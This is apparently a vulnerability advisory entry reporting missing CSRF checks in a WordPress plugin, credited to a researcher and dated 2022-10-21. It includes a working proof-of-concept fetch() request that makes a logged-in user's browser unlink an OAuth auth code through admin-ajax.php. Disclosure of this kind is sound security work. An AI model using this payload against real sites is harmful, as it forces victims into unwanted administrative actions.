The plugin does not have CSRF checks in some places, which could allow attackers to make logged-in users perform unwanted actions.
Make a logged in user visit a page with the following code fetch('https://example.com/wp-admin/admin-ajax.php', { method: 'POST', headers: new Headers({ 'Content-Type': 'application/x-www-form-urlencoded', }), body: 'action=dpt-oauth-ajax&call=unlink_auth_code', redirect: 'follow' }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error));
Lana Codes
Lana Codes
Yes
2022-10-21 (about 3 months ago)
2022-10-21 (about 3 months ago)
2022-10-21 (about 3 months ago)